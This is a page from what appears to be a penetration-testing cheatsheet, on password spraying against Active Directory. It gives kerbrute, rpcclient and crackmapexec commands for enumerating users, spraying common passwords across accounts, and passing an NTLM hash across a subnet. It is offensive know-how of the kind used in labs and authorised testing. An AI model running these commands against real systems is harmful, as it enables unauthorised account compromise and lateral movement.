Cheatsheet
  • Documentation
  • Nmap
  • Ffuf
  • FTP
  • SMB
  • RPC
  • NFS
  • DNS
  • SMTP
  • IMAP / POP3
  • SNMP
  • SQL
  • Rsync
  • Certipy
  • CrackMapExec
  • Transferring Files
  • Windows Remote Management
  • Windows AV
  • Wordpress
  • Infrastructure Enumeration
  • Privilege Escalation
  • Docker Breakout
  • Shells
  • SSTI
  • XSS
  • Pivot
    • SSH Tunneling
    • Chisel
    • Ligolo-ng
    • Meterpreter
  • LDAP
  • Spray
  • Antivirus / EDR
  • Impacket
  • Bloodhound
  • Powershell
  • Kerberosting
  • Password Attacks
  • Command Injections
  • Sliver C2
  • Windows credentials
  • Windows persistance
  • VSCode Debug
Powered by GitBook
On this page
  • Kerbrute
  • Rpcclient
  • Crackmapexec

Spray

Kerbrute

kerbrute userenum -d qu35t.pw --dc 172.17.0.3 users.txt
kerbrute passwordspray -d qu35t.pw --dc 172.17.0.3 users.txt 'Summer2022!'
ntpdate 10.10.10.10

Rpcclient

for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.17.0.3 | grep Authority; done

Crackmapexec

crackmapexec smb 172.17.0.3 -u valid_users.txt -p Password123 --continue-on-success | grep +
crackmapexec smb --local-auth 172.17.0.0/24 -u administrator -H 88ad09182de639ccc6579eb0849751cf --continue-on-success | grep +
PreviousLDAPNextAntivirus / EDR

Last updated 2 years ago